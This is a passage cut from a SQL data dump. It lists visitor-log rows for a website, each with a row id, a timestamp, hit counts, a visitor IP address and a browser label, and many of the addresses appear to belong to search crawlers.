.219','chrome'),(285215,1533824738,1,1,0,0,'54.36.148.223','other'),(285216,1533824790,2,2,0,0,'178.154.171.88','other'),(285217,1533824871,1,1,0,0,'54.36.149.80','other'),(285218,1533825027,1,1,0,0,'54.36.148.69','other'),(285219,1533825168,1,1,0,0,'54.36.149.56','other'),(285220,1533825288,1,1,0,0,'54.36.148.158','other'),(285221,1533825298,1,1,0,0,'54.36.148.159','other'),(285222,1533825538,1,1,0,0,'54.36.148.16','other'),(285223,1533825680,1,1,0,0,'91.196.178.134','firefox'),(285224,1533825818,1,1,0,0,'54.36.148.53','other'),(285225,1533825954,1,1,0,0,'54.36.149.18','other'),(285226,1533825977,1,1,0,0,'54.36.148.47','other'),(285227,1533826343,1,1,0,0,'54.36.149.8','other'),(285228,1533826492,1,1,0,0,'54.36.148.103','other'),(285229,1533826618,1,1,0,0,'54.36.148.253','other'),(285230,1533826688,1,1,0,0,'54.36.148.49','other'),(285231,1533826763,1,1,0,0,'54.36.149.0','other'),(285232,1533827102,1,1,0,0,'178.251.107.32','chrome'),(285233,1533827306,1,1,0,0,'54.36.149.64','other'),(285234,1533827593,1,1,0,0,'141.8.142.74','other'),(285235,1533827804,1,1,0,0,'185.100.86.182','other'),(285236,1533827991,1,1,0,0,'54.36.148.223','other'),(285237,1533828063,1,1,0,0,'54.36.149.80','other'),(285238,1533828106,1,1,0,0,'54.36.148.202','other'),(285239,1533828197,1,1,0,0,'188.230.43.254','other'),(285240,1533828227,1,1,0,0,'54.36.148.66','other'),(285241,1533828335,1,1,0,0,'157.55.39.244','other'),(285242,1533828429,1,1,0,0,'193.19.119.86','firefox'),(285243,1533828646,1,1,0,0,'54.36.148.211','other'),(285244,1533828843,2,2,0,0,'94.23.196.106','other'),(285245,1533828907,1,1,0,0,'54.36.148.139','other'),(285246,1533829272,1,1,0,0,'54.36.148.180','other'),(285247,1533829671,1,1,0,0,'54.36.148.13','other'),(285248,1533829726,1,1,0,0,'54.36.148.209','other'),(285249,1533830087,1,1,0,0,'216.244.66.241','other'),(285250,1533830094,1,1,0,0,'54.36.148.51','other'),(285251,1533830520,1,1,0,0,'54.36.149.93','other'),(285252,1533830551,1,1,0,0,'188.230.43.254','other'),(285253,1533830672,1,1,0,0,'54.36.148.168','other'),(285254,1533830828,1,1,0,0,'54.36.148.251','other'),(285255,1533830831,1,1,0,0,'54.36.149.34','other'),(285256,1533830921,1,1,0,0,'54.36.148.40','other'),(285257,1533830985,1,1,0,0,'54.36.148.220','other'),(285258,1533831200,1,1,0,0,'54.36.148.204','other'),(285259,1533831293,1,1,0,0,'54.36.148.205','other'),(285260,1533831526,1,1,0,0,'54.36.148.87','other'),(285261,1533831581,1,1,0,0,'178.154.171.88','other'),(285262,1533831628,1,1,0,0,'8.29.198.26','other'),(285263,1533831729,1,1,0,0,'54.36.148.232','other'),(285264,1533831859,1,1,0,0,'54.36.148.159','other'),(285265,1533831872,1,1,0,0,'54.36.148.246','other'),(285266,1533832193,1,1,0,0,'54.36.148.52','other'),(285267,1533832431,1,1,0,0,'54.36.148.146','other'),(285268,1533832504,1,1,0,0,'54.36.149.105','other'),(285269,1533832514,1,1,0,0,'54.36.148.33','other'),(285270,1533832898,1,1,0,0,'54.36.148.76','other'),(285271,1533832954,1,1,0,0,'188.230.43.254','other'),(285272,1533832995,1,1,0,0,'54.36.148.32','other'),(285273,1533833013,1,1,0,0,'54.36.149.39','other'),(285274,1533833065,1,1,0,0,'141.8.142.74','other'),(285275,1533833192,2,2,0,0,'54.36.149.14','other'),(285276,1533833356,1,1,0,0,'66.249.81.200','chrome'),(285277,1533833608,1,1,0,0,'54.36.148.34','other'),(285278,1533833735,1,1,0,0,'8.29.198.26','other'),(285279,1533833919,1,1,0,0,'54.36.148.206','other'),(285280,1533834483,1,1,0,0,'54.36.148.105','other'),(285281,1533834492,1,1,0,0,'54.36.148.186','other'),(285282,1533834495,1,1,0,0,'54.36.148.165','other'),(285283,1533834530,1,1,0,0,'91.196.178.73','firefox'),(285284,1533834557,1,1,0,0,'54.36.148.128','other'),(285285,1533834571,1,1,0,0,'159.65.175.83','other'),(285286,1533834766,1,1,0,0,'54.36.148.145','other'),(285287,1533834959,1,1,0,0,'51.15.81.222','other'),(285288,1533835259,1,1,0,0,'141.8.142.74','other'),(285289,1533835304,1,1,0,0,'157.55.39.9','other'),(285290,1533835385,1,1,0,0,'188.230.43.254','other'),(285291,1533835472,1,1,0,0,'54.36.148.28','other'),(285292,1533835637,1,1,0,0,'54.36.148.116','other'),(285293,1533835744,1,1,0,0,'54.36.148.126','other'),(285294,1533835888,1,1,0,0,'54.36.148.36','other'),(285295,1533835892,1,1,0,0,'54.36.148.201','other'),(285296,1533835947,1,1,0,0,'54.36.148.132','other'),(285297,1533836115,1,1,0,0,'54.36.148.70','other'),(285298,1533836168,1,1,0,0,'193.194.127.222','firefox'),(285299,1533836335,1,1,0,0,'54.36.149.1','other'),(285300,1533836454,1,1,0,0,'54.36.148.83','other'),(285301,1533836481,1,1,0,0,'54.36.148.228','other'),(285302,1533836536,1,0,1,0,'66.249.69.144',''),(285303,1533837009,1,1,0,0,'54.36.148.106','other'),(285304,1533837092,1,1,0,0,'54.36.148.45','other'),(285305,1533837514,2,2,0,0,'216.244.66.241','other'),(285306,1533837685,1,1,0,0,'178.154.171.88','other'),(285307,1533837697,1,1,0,0,'207.46.13.115','other'),(285308,1533837788,1,1,0,0,'188.230.43.254','other'),(285309,1533837912,1,1,0,0,'141.8.142.74','other'),(285310,1533838369,1,1,0,0,'54.36.149.107','other'),(285311,1533838374,1,1,0,0,'54.36.149.72','other'),(285312,1533838529,1,1,0,0,'185.100.87.207','other'),(285313,1533838708,1,1,0,0,'54.36.148.59','other'),(285314,1533838955,1,1,0,0,'54.36.148.74','other'),(285315,1533839063,1,1,0,0,'54.36.148.98','other'),(285316,1533839187,1,1,0,0,'54.36.148.177','other'),(285317,1533839393,1,1,0,0,'54.36.149.26','other'),(285318,1533840117,1,1,0,0,'54.36.149.89','other'),(285319,1533840250,1,1,0,0,'54.36.149.103','other'),(285320,1533840324,1,1,0,0,'207.46.13.87','other'),(285321,1533840676,1,1,0,0,'54.36.149.75','other'),(285322,1533840843,1,1,0,0,'54.36.148.27','other'),(285323,1533840930,1,1,0,0,'54.36.148.131','other'),(285324,1533841551,1,1,0,0,'54.36.149.26','other'),(285325,1533841915,1,1,0,0,'54.36.148.58','other'),(285326,1533842109,1,1,0,0,'54.36.149.65','other'),(285327,1533842148,1,1,0,0,'185.220.101.21','other'),(285328,1533842310,1,1,0,0,'95.163.255.97','other'),(285329,1533842392,1,1,0,0,'67.220.189.146','firefox'),(285330,1533842493,1,1,0,0,'8.29.198.25','other'),(285331,1533842682,1,1,0,0,'54.36.148.12','other'),(285332,1533842702,1,1,0,0,'46.211.152.185','chrome'),(285333,1533843089,1,1,0,0,'54.36.148.153','other'),(285334,1533843299,1,1,0,0,'54.36.148.94','other'),(285335,1533843375,1,1,0,0,'54.36.148.130','other'),(285336,1533843621,1,1,0,0,'54.36.149.61','other'),(285337,1533843754,1,1,0,0,'54.36.148.146','other'),(285338,1533843884,1,1,0,0,'141.8.142.74','other'),(285339,1533843994,1,1,0,0,'54.36.149.15','other'),(285340,1533844190,1,1,0,0,'54.36.149.87','other'),(285341,1533844254,2,2,0,0,'91.196.178.88','chrome'),(285342,1533844430,1,1,0,0,'54.36.148.55','other'),(285343,1533844577,1,1,0,0,'8.29.198.27','other'),(285344,1533844657,1,1,0,0,'54.36.148.72','other'),(285345,1533844938,1,1,0,0,'178.154.171.88','other'),(285346,1533845156,1,1,0,0,'66.249.81.200','chrome'),(285347,1533845545,1,1,0,0,'54.36.148.85','other'),(285348,1533845584,1,1,0,0,'54.36.149.68','other'),(285349,1533845732,1,1,0,0,'91.219.236.171','other'),(285350,1533845736,1,1,0,0,'54.36.149.50','other'),(285351,1533846150,1,1,0,0,'46.211.116.188','chrome'),(285352,1533846170,1,1,0,0,'54.36.148.229','other'),(285353,1533846214,1,1,0,0,'54.36.148.167','other'),(285354,1533846335,1,1,0,0,'54.36.148.155','other'),(285355,1533846412,1,1,0,0,'54.36.148.62','other'),(285356,1533846460,1,1,0,0,'54.36.149.91','other'),(285357,1533846584,1,1,0,0,'54.36.148.221','other'),(285358,1533846639,1,1,0,0,'54.36.148.244','other'),(285359,1533846701,1,1,0,0,'54.36.148.111','other'),(285360,1533847137,1,1,0,0,'91.209.11.236','other'),(285361,1533847353,1,1,0,0,'178.154.171.88','other'),(285362,1533847440,1,1,0,0,'54.36.148.133','other'),(285363,1533847736,1,1,0,0,'54.36.148.103','other'),(285364,1533848090,1,1,0,0,'54.36.148.23','other'),(285365,1533848172,1,1,0,0,'54.36.148.50','other'),(285366,1533848244,1,1,0,0,'54.36.149.4','other'),(285367,1533848436,1,0,1,0,'66.249.69.145',''),(285368,1533848749,1,1,0,0,'54.36.148.26','other'),(285369,1533848880,1,1,0,0,'54.36.149.38','other'),(285370,1533849106,1,1,0,0,'37.9.113.182','other'),(285371,1533849330,1,1,0,0,'195.254.134.242','other'),(285372,1533849467,1,1,0,0,'54.36.148.34','other'),(285373,1533849579,1,1,0,0,'54.36.148.227','other'),(285374,1533849634,1,1,0,0,'178.154.171.88','other'),(285375,1533849755,1,1,0,0,'54.36.148.76','other'),(285376,1533849770,1,1,0,0,'54.36.148.172','other'),(285377,1533849853,1,1,0,0,'141.8.142.74','other'),(285378,1533849936,1,1,0,0,'66.102.9.35','chrome'),(285379,1533849945,1,1,0,0,'66.102.9.38','chrome'),(285380,1533849948,1,1,0,0,'91.196.178.98','chrome'),(285381,1533849982,1,1,0,0,'216.244.66.241','other'),(285382,1533850095,1,1,0,0,'66.102.9.40','chrome'),(285383,1533850428,1,1,0,0,'54.36.148.239','other'),(285384,1533850828,1,1,0,0,'54.36.149.13','other'),(285385,1533850844,1,1,0,0,'178.154.171.88','other'),(285386,1533851216,1,0,1,0,'66.249.75.153',''),(285387,1533851456,1,1,0,0,'54.36.148.216','other'),(285388,1533851562,1,1,0,0,'54.36.148.81','other'),(285389,1533851795,1,1,0,0,'54.36.148.251','other'),(285390,1533851882,1,1,0,0,'54.36.148.139','other'),(285391,1533851888,1,1,0,0,'54.36.148.146','other'),(285392,1533852031,1,1,0,0,'54.36.148.219','other'),(285393,1533852094,1,1,0,0,'162.210.196.129','other'),(285394,1533852235,1,1,0,0,'54.36.149.41','other'),(285395,1533852425,1,1,0,0,'54.36.149.2','other'),(285396,1533852699,1,1,0,0,'37.9.113.101','other'),(285397,1533852930,1,1,0,0,'46.36.38.57','other'),(285398,1533852985,1,1,0,0,'54.36.148.39','other'),(285399,1533853343,1,1,0,0,'8.29.198.25','other'),(285400,1533853344,1,1,0,0,'54.36.149.86','other'),(285401,1533853396,1,1,0,0,'54.36.148.138','other'),(285402,1533853457,2,2,0,0,'178.154.171.88','other'),(285403,1533853498,1,1,0,0,'54.36.148.38','other'),(285404,1533853765,1,1,0,0,'54.36.149.32','other'),(285405,1533854367,1,1,0,0,'54.36.148.242','other'),(285406,1533854401,1,1,0,0,'54.36.148.42','other'),(285407,1533854638,1,1,0,0,'54.36.148.118','other'),(285408,1533854670,1,1,0,0,'54.36.148.52','other'),(285409,1533854696,1,1,0,0,'54.36.149.97','other'),(285410,1533854990,1,1,0,0,'178.154.171.88','other'),(285411,1533855023,1,1,0,0,'54.36.148.174','other'),(285412,1533855058,1,1,0,0,'54.36.148.22','other'),(285413,1533855152,1,1,0,0,'54.36.148.78','other'),(285414,1533855154,1,1,0,0,'216.244.66.241','other'),(285415,1533855184,1,1,0,0,'54.36.148.73','other'),(285416,1533855227,1,1,0,0,'54.36.149.101','other'),(285417,1533855418,1,1,0,0,'8.29.198.25','other'),(285418,1533855457,1,0,1,0,'66.249.66.156',''),(285419,1533855527,1,1,0,0,'54.36.149.56','other'),(285420,1533855640,1,1,0,0,'54.36.148.172','other'),(285421,1533855714,1,1,0,0,'157.55.39.9','other'),(285422,1533855793,1,1,0,0,'157.55.39.244','other'),(285423,1533856543,1,1,0,0,'51.15.53.83','other'),(285424,1533856773,1,1,0,0,'54.36.149.83','other'),(285425,1533857013,1,1,0,0,'54.36.148.68','other'),(285426,1533857154,1,1,0,0,'54.36.149.56','other'),(285427,1533857277,1,1,0,0,'54.36.148.111','other'),(285428,1533857323,1,1,0,0,'54.36.149.36','other'),(285429,1533857861,1,1,0,0,'54.36.148.82','other'),(285430,1533857890,1,1,0,0,'54.36.148.11','other'),(285431,1533857956,1,1,0,0,'54.36.148.40','other'),(285432,1533858337,1,1,0,0,'95.24.18.1','chrome'),(285433,1533858383,1,1,0,0,'157.55.39.9','other'),(285434,1533858450,1,1,0,0,'54.36.149.58','other'),(285435,1533858862,1,1,0,0,'54.36.148.91','other'),(285436,1533858944,1,1,0,0,'54.36.148.175','other'),(285437,1533859030,1,1,0,0,'54.36.148.64','other'),(285438,1533859110,1,1,0,0,'195.22.127.231','chrome'),(285439,1533859189,1,1,0,0,'54.36.148.112','other'),(285440,1533859209,1,1,0,0,'54.36.148.176','other'),(285441,1533860078,1,1,0,0,'54.36.149.87','other'),(285442,1533860523,1,1,0,0,'54.36.149.106','other'),(285443,1533860578,1,1,0,0,'54.36.148.75','other'),(285444,1533860662,1,1,0,0,'54.36.148.65','other'),(285445,1533860667,1,1,0,0,'54.36.148.64','other'),(285446,1533861188,1,1,0,0,'54.36.149.45','other'),(285447,1533861215,1,1,0,0,'54.36.149.65','other'),(285448,1533861413,1,1,0,0,'54.36.148.99','other'),(285449,1533861572,1,1,0,0,'54.36.149.55','other'),(285450,1533861820,1,1,0,0,'178.154.171.88','other'),(285451,1533862095,1,1,0,0,'54.36.148.153','other'),(285452,1533862295,1,1,0,0,'54.36.148.242','other'),(285453,1533862332,1,1,0,0,'54.36.148.78','other'),(285454,1533863012,1,1,0,0,'54.36.148.26','other'),(285455,1533863039,1,1,0,0,'54.36.148.249','other'),(285456,1533863345,1,1,0,0,'54.36.148.234','other'),(285457,1533863372,1,1,0,0,'54.36.148.192','other'),(285458,1533863428,1,1,0,0,'54.36.148.72','other'),(285459,1533863702,1,1,0,0,'54.36.148.153','other'),(285460,1533863716,1,1,0,0,'54.36.148.255','other'),(285461,1533863722,1,1,0,0,'185.34.33.2','other'),(285462,1533863998,1,1,0,0,'54.36.148.144','other'),(285463,1533864187,1,1,0,0,'8.29.198.27','other'),(285464,1533864364,2,2,0,0,'178.154.171.88','other'),(285465,1533864572,1,1,0,0,'52.41.211.72','chrome'),(285466,1533864736,1,1,0,0,'54.36.148.194','other'),(285467,1533864867,1,1,0,0,'54.36.148.98','other'),(285468,1533864947,2,2,0,0,'141.8.142.74','other'),(285469,1533865010,1,1,0,0,'54.36.148.36','other'),(285470,1533865041,1,1,0,0,'54.36.148.117','other'),(285471,1533865088,1,1,0,0,'54.36.148.237','other'),(285472,1533865124,1,1,0,0,'54.36.149.27','other'),(285473,1533865253,1,1,0,0,'87.250.224.46','other'),(285474,1533865309,1,1,0,0,'54.36.148.234','other'),(285475,1533865360,1,0,1,0,'66.249.66.155',''),(285476,1533865374,1,1,0,0,'54.36.148.19','other'),(285477,1533865597,1,1,0,0,'54.36.149.15','other'),(285478,1533866001,1,1,0,0,'54.36.149.49','other'),(285479,1533866004,1,1,0,0,'54.36.148.233','other'),(285480,1533866100,1,1,0,0,'54.36.148.116','other'),(285481,1533866270,1,1,0,0,'8.29.198.27','other'),(285482,1533866297,1,1,0,0,'178.154.171.88','other'),(285483,1533866347,1,1,0,0,'54.36.148.135','other'),(285484,1533866766,1,1,0,0,'54.36.148.111','other'),(285485,1533866809,1,1,0,0,'54.36.148.138','other'),(285486,1533867004,1,1,0,0,'141.8.142.74','other'),(285487,1533867122,1,1,0,0,'157.55.39.9','other'),(285488,1533867143,1,1,0,0,'54.36.148.211','other'),(285489,1533867216,1,1,0,0,'54.36.148.236','other'),(285490,1533867301,1,1,0,0,'54.36.149.81','other'),(285491,1533867317,1,1,0,0,'185.220.102.8','other'),(285492,1533867393,1,1,0,0,'54.36.148.172','other'),(285493,1533867431,1,1,0,0,'54.36.148.132','other'),(285494,1533867434,1,1,0,0,'54.36.148.15','other'),(285495,1533867574,1,1,0,0,'54.36.148.139','other'),(285496,1533867605,1,1,0,0,'54.36.148.244','other'),(285497,1533867679,1,1,0,0,'54.36.148.109','other'),(285498,1533867785,1,1,0,0,'54.36.149.31','other'),(285499,1533868016,1,1,0,0,'178.154.171.88','other'),(285500,1533868256,1,1,0,0,'54.36.148.229','other'),(285501,1533868604,1,1,0,0,'54.36.148.178','other'),(285502,1533868691,1,1,0,0,'54.36.148.167','other'),(285503,1533868777,1,1,0,0,'54.36.148.164','other'),(285504,1533868778,1,1,0,0,'54.36.148.233','other'),(285505,1533869167,1,1,0,0,'54.36.148.36','other'),(285506,1533869247,1,1,0,0,'216.244.66.241','other'),(285507,1533869307,1,1,0,0,'54.36.148.174','other'),(285508,1533870483,1,1,0,0,'95.163.255.97','other'),(285509,1533870545,12,12,0,0,'91.137.17.218','other'),(285510,1533870585,5,5,0,0,'95.91.13.15','other'),(285511,1533870780,1,1,0,0,'54.36.149.94','other'),(285512,1533870819,1,1,0,0,'54.36.148.119','other'),(285513,1533870945,1,1,0,0,'185.220.101.25','other'),(285514,1533871014,1,1,0,0,'54.36.148.179','other'),(285515,1533871096,1,1,0,0,'54.36.149.14','other'),(285516,1533871564,1,1,0,0,'54.36.149.107','other'),(285517,1533871633,1,1,0,0,'54.36.149.36','other'),(285518,1533871666,1,1,0,0,'54.36.148.239','other'),(285519,1533872032,1,1,0,0,'54.36.148.150','other'),(285520,1533872077,1,1,0,0,'54.36.148.49','other'),(285521,1533872514,1,1,0,0,'54.36.149.61','other'),(285522,1533872753,1,1,0,0,'54.36.148.140','other'),(285523,1533872832,1,1,0,0,'54.36.149.90','other'),(285524,1533872904,1,1,0,0,'54.36.148.73','other'),(285525,1533873051,1,1,0,0,'54.36.148.120','other'),(285526,1533873177,1,1,0,0,'54.36.149.70','other'),(285527,1533873214,1,1,0,0,'54.36.148.248','other'),(285528,1533873247,5,5,0,0,'157.55.39.9','other'),(285529,1533873343,1,1,0,0,'54.36.148.177','other'),(285530,1533873681,4,4,0,0,'192.151.152.98','other'),(285531,1533873695,3,3,0,0,'207.46.13.87','other'),(285532,1533873709,4,4,0,0,'207.46.13.115','other'),(285533,1533873714,6,6,0,0,'157.55.39.244','other'),(285534,1533873780,1,1,0,0,'54.36.149.101','other'),(285535,1533873931,1,1,0,0,'54.36.148.197','other'),(285536,1533874230,1,1,0,0,'178.154.171.88','other'),(285537,1533874378,1,1,0,0,'54.36.148.178','other'),(285538,1533874405,1,1,0,0,'54.36.149.39','other'),(285539,1533874569,1,1,0,0,'54.36.149.9','other'),(285540,1533874670,1,1,0,0,'54.36.148.227','other'),(285541,1533874755,1,1,0,0,'54.36.148.114','other'),(285542,1533874892,1,1,0,0,'54.36.148.61','other'),(285543,1533874976,1,1,0,0,'54.36.148.243','other'),(285544,1533875035,1,1,0,0,'8.29.198.27','other'),(285545,1533875146,1,1,0,0,'54.36.148.89','other'),(285546,1533875272,1,1,0,0,'54.36.148.102','other'),(285547,1533875279,1,1,0,0,'54.36.149.85','other'),(285548,1533875305,1,1,0,0,'54.36.148.185','other'),(285549,1533875831,1,1,0,0,'54.36.148.231','other'),(285550,1533876084,1,1,0,0,'141.8.142.74','other'),(285551,1533876145,1,1,0,0,'54.36.149.80','other'),(285552,1533876228,1,1,0,0,'54.36.148.99','other'),(285553,1533876299,1,1,0,0,'54.36.149.3','other'),(285554,1533876965,1,1,0,0,'54.36.148.54','other'),(285555,1533877106,1,1,0,0,'8.29.198.26','other'),(285556,1533877205,1,1,0,0,'54.36.148.12','other'),(285557,1533877666,1,1,0,0,'54.36.148.171','other'),(285558,1533877859,1,1,0,0,'54.36.148.185','other'),(285559,1533878026,1,1,0,0,'54.36.148.246','other'),(285560,1533878144,1,1,0,0,'77.247.181.165','other'),(285561,1533878378,1,1,0,0,'54.36.148.232','other'),(285562,1533878822,1,1,0,0,'54.36.148.141','other'),(285563,1533878884,1,1,0,0,'141.8.142.74','other'),(285564,1533879037,1,1,0,0,'54.36.148.76','other'),(285565,1533879142,1,1,0,0,'54.36.148.103','other'),(285566,1533879164,1,1,0,0,'54.36.148.200','other'),(285567,1533879217,1,1,0,0,'54.36.148.239','other'),(285568,1533880144,1,1,0,0,'54.36.148.13','other'),(285569,1533880196,1,1,0,0,'54.36.149.84','other'),(285570,1533880282,1,1,0,0,'54.36.149.36','other'),(285571,1533880796,1,1,0,0,'54.36.149.2','other'),(285572,1533880874,1,1,0,0,'54.36.149.34','other'),(285573,1533880964,1,1,0,0,'13.66.172.68','other'),(285574,1533881141,1,1,0,0,'54.36.148.153','other'),(285575,1533881166,1,1,0,0,'216.244.66.241','other'),(285576,1533881433,1,1,0,0,'35.162.141.144','chrome'),(285577,1533881474,1,1,0,0,'91.196.178.88','chrome'),(285578,1533881508,1,1,0,0,'178.154.171.88','other'),(285579,1533881727,1,1,0,0,'54.36.149.55','other'),(285580,1533881793,1,1,0,0,'54.36.148.211','other'),(285581,1533882227,1,1,0,0,'213.108.75.89','chrome'),(285582,1533882532,1,1,0,0,'54.36.149.63','other'),(285583,1533882706,1,1,0,0,'91.196.178.71','chrome'),(285584,1533882789,1,1,0,0,'54.36.149.40','other'),(285585,1533882826,1,1,0,0,'94.178.32.177','chrome'),(285586,1533882879,1,1,0,0,'54.36.148.37','other'),(285587,1533882957,1,1,0,0,'54.36.148.100','other'),(285588,1533883406,1,1,0,0,'157.55.39.9','other'),(285589,1533883441,1,1,0,0,'66.102.9.35','chrome'),(285590,1533883541,2,2,0,0,'217.148.55.106','chrome'),(285591,1533883779,1,1,0,0,'54.36.149.61','other'),(285592,1533883889,1,1,0,0,'54.36.148.169','other'),(285593,1533884272,1,1,0,0,'178.154.171.88','other'),(285594,1533884374,1,1,0,0,'54.36.149.28','other'),(285595,1533884463,1,1,0,0,'54.36.149.71','other'),(285596,1533884698,1,1,0,0,'54.36.149.42','other'),(285597,1533885015,2,2,0,0,'54.36.149.57','other'),(285598,1533885018,1,1,0,0,'54.36.149.105','other'),(285599,1533885078,1,1,0,0,'54.36.149.34','other'),(285600,1533885253,1,1,0,0,'54.36.148.19','other'),(285601,1533885262,1,1,0,0,'54.36.148.234','other'),(285602,1533885285,1,1,0,0,'91.196.178.77','chrome'),(285603,1533885330,1,1,0,0,'185.220.101.25','other'),(285604,1533885412,1,1,0,0,'54.36.149.85','other'),(285605,1533885739,1,1,0,0,'54.36.149.106','other'),(285606,1533885747,1,1,0,0,'54.36.148.69','other'),(285607,1533885781,1,1,0,0,'54.36.148.81','other'),(285608,1533885793,1,1,0,0,'54.36.148.51','other'),(285609,1533885881,1,1,0,0,'54.36.148.232','other'),(285610,1533885885,1,1,0,0,'8.29.198.26','other'),(285611,1533886035,1,1,0,0,'54.36.148.122','other'),(285612,1533886267,1,1,0,0,'54.36.149.19','other'),(285613,1533886441,1,1,0,0,'54.36.148.11','other'),(285614,1533886496,1,1,0,0,'54.36.148.53','other'),(285615,1533886542,1,1,0,0,'54.36.148.189','other'),(285616,1533886550,1,1,0,0,'54.36.148.208','other'),(285617,1533886893,2,2,0,0,'141.8.142.74','other'),(285618,1533887176,1,1,0,0,'91.196.178.100','chrome'),(285619,1533887214,2,2,0,0,'54.36.148.25','other'),(285620,1533887300,1,1,0,0,'54.36.149.17','other'),(285621,1533887307,1,1,0,0,'54.36.148.238','other'),(285622,1533887346,2,2,0,0,'54.36.148.244','other'),(285623,1533887420,1,1,0,0,'46.211.158.145','chrome'),(285624,1533887548,1,1,0,0,'54.36.149.66','other'),(285625,1533887648,1,1,0,0,'82.145.208.145','other'),(285626,1533887679,1,1,0,0,'54.36.148.100','other'),(285627,1533887681,1,1,0,0,'95.163.255.94','other'),(285628,1533887879,1,1,0,0,'54.36.148.12','other'),(285629,1533887962,1,1,0,0,'8.29.198.25','other'),(285630,1533888332,2,2,0,0,'144.76.137.254','other'),(285631,1533888342,1,1,0,0,'54.36.148.165','other'),(285632,1533888708,1,1,0,0,'54.36.148.149','other'),(285633,1533888725,1,1,0,0,'141.8.142.74','other'),(285634,1533888752,1,1,0,0,'54.36.148.128','other'),(285635,1533888947,1,1,0,0,'80.82.215.17','other'),(285636,1533889091,1,1,0,0,'54.36.148.156','other'),(285637,1533889127,1,1,0,0,'82.145.209.203','other'),(285638,1533889232,1,1,0,0,'54.36.148.230','other'),(285639,1533889351,1,1,0,0,'54.36.149.83','other'),(285640,1533889618,1,1,0,0,'54.36.149.8','other'),(285641,1533890108,1,1,0,0,'54.36.148.216','other'),(285642,1533890264,1,1,0,0,'141.8.142.74','other'),(285643,1533890283,1,1,0,0,'54.36.148.40','other'),(285644,1533890374,1,1,0,0,'54.36.148.184','other'),(285645,1533890510,1,1,0,0,'54.36.149.106','other'),(285646,1533890540,1,1,0,0,'54.36.148.207','other'),(285647,1533890646,1,1,0,0,'91.196.178.71','chrome'),(285648,1533890764,1,1,0,0,'54.36.148.115','other'),(285649,1533891207,1,1,0,0,'54.36.148.235','other'),(285650,1533891274,1,1,0,0,'95.132.28.131','firefox'),(285651,1533891329,1,1,0,0,'193.106.30.99','other'),(285652,1533891545,1,1,0,0,'54.36.148.124','other'),(285653,1533891768,1,1,0,0,'91.196.178.71','chrome'),(285654,1533891839,1,1,0,0,'54.36.148.157','other'),(285655,1533891944,1,1,0,0,'54.36.148.188','other'),(285656,1533891951,1,1,0,0,'54.36.149.65','other'),(285657,1533891965,1,1,0,0,'162.210.196.129','other'),(285658,1533892380,1,0,1,0,'66.249.66.155',''),(285659,1533892401,1,1,0,0,'54.36.149.36','other'),(285660,1533892425,1,1,0,0,'54.36.149.61','other'),(285661,1533892537,1,1,0,0,'185.220.101.44','other'),(285662,1533893062,1,1,0,0,'54.36.148.103','other'),(285663,1533893077,2,2,0,0,'54.36.148.181','other'),(285664,1533893261,1,1,0,0,'54.36.148.148','other'),(285665,1533893341,1,1,0,0,'54.36.148.119','other'),(285666,1533893440,2,2,0,0,'141.8.142.74','other'),(285667,1533893479,1,0,1,0,'66.249.66.155',''),(285668,1533893498,1,1,0,0,'54.36.148.156','other'),(285669,1533893804,1,1,0,0,'54.36.148.241','other'),(285670,1533894269,1,1,0,0,'54.36.148.15','other'),(285671,1533894396,1,0,1,0,'66.249.66.155',''),(285672,1533894404,1,1,0,0,'66.249.66.57','chrome'),(285673,1533894412,1,0,1,0,'66.249.66.59',''),(285674,1533894437,1,1,0,0,'54.36.148.250','other'),(285675,1533894810,2,2,0,0,'91.227.182.178','chrome'),(285676,1533894862,1,1,0,0,'54.36.148.242','other'),(285677,1533894996,1,1,0,0,'178.154.171.88','other'),(285678,1533895104,1,1,0,0,'54.36.148.228','other'),(285679,1533895554,1,1,0,0,'54.36.149.18','other'),(285680,1533895555,1,1,0,0,'54.36.148.49','other'),(285681,1533895904,1,1,0,0,'54.36.148.225','other'),(285682,1533896076,1,1,0,0,'54.36.148.163','other'),(285683,1533896130,1,1,0,0,'176.126.252.12','other'),(285684,1533896573,1,1,0,0,'95.134.201.161','chrome'),(285685,1533896724,1,1,0,0,'8.29.198.27','other'),(285686,1533896727,1,1,0,0,'82.145.209.223','other'),(285687,1533896735,1,1,0,0,'82.145.208.86','other'),(285688,1533896823,1,1,0,0,'178.154.171.88','other'),(285689,1533896906,2,0,2,0,'66.249.66.156',''),(285690,1533896918,1,1,0,0,'54.36.148.158','other'),(285691,1533896989,1,1,0,0,'54.36.149.89','other'),(285692,1533897282,1,1,0,0,'91.123.146.45','chrome'),(285693,1533897448,1,1,0,0,'91.196.178.164','chrome'),(285694,1533897508,1,1,0,0,'54.36.148.198','other'),(285695,1533897623,1,1,0,0,'157.55.39.244','other'),(285696,1533897663,1,1,0,0,'54.36.148.122','other'),(285697,1533897758,1,1,0,0,'54.36.148.249','other'),(285698,1533897878,1,1,0,0,'54.36.149.103','other'),(285699,1533898122,1,1,0,0,'54.36.148.129','other'),(285700,1533898182,1,1,0,0,'54.36.148.82','other'),(285701,1533898284,1,0,1,0,'66.249.66.61',''),(285702,1533898408,2,2,0,0,'141.8.142.74','other'),(285703,1533898796,1,1,0,0,'8.29.198.25','other'),(285704,1533898798,1,0,1,0,'66.249.66.155',''),(285705,1533898843,1,1,0,0,'54.36.148.125','other'),(285706,1533898913,1,1,0,0,'54.36.149.103','other'),(285707,1533899307,1,1,0,0,'54.36.148.138','other'),(285708,1533899329,1,1,0,0,'54.36.148.119','other'),(285709,1533899436,1,1,0,0,'54.36.149.62','other'),(285710,1533899542,1,1,0,0,'141.8.142.74','other'),(285711,1533899662,1,1,0,0,'163.172.4.153','chrome'),(285712,1533899734,1,1,0,0,'54.38.138.63','other'),(285713,1533899853,1,1,0,0,'54.36.148.56','other'),(285714,1533899905,1,1,0,0,'207.46.13.115','other'),(285715,1533900211,1,1,0,0,'54.36.149.59','other'),(285716,1533900256,1,1,0,0,'91.196.178.165','chrome'),(285717,1533900283,1,1,0,0,'54.36.148.108','other'),(285718,1533900609,1,1,0,0,'54.36.148.57','other'),(285719,1533900664,1,1,0,0,'54.36.149.96','other'),(285720,1533900767,1,1,0,0,'91.196.178.172','chrome'),(285721,1533900881,1,0,1,0,'66.249.66.157',''),(285722,1533901060,1,1,0,0,'54.36.148.202','other'),(285723,1533901069,1,1,0,0,'54.36.148.172','other'),(285724,1533901264,1,0,1,0,'66.249.66.155',''),(285725,1533901321,1,1,0,0,'54.36.148.211','other'),(285726,1533901329,1,1,0,0,'54.36.148.252','other'),(285727,1533901455,1,1,0,0,'54.36.148.23','other'),(285728,1533901597,1,1,0,0,'54.36.149.43','other'),(285729,1533901600,1,1,0,0,'157.55.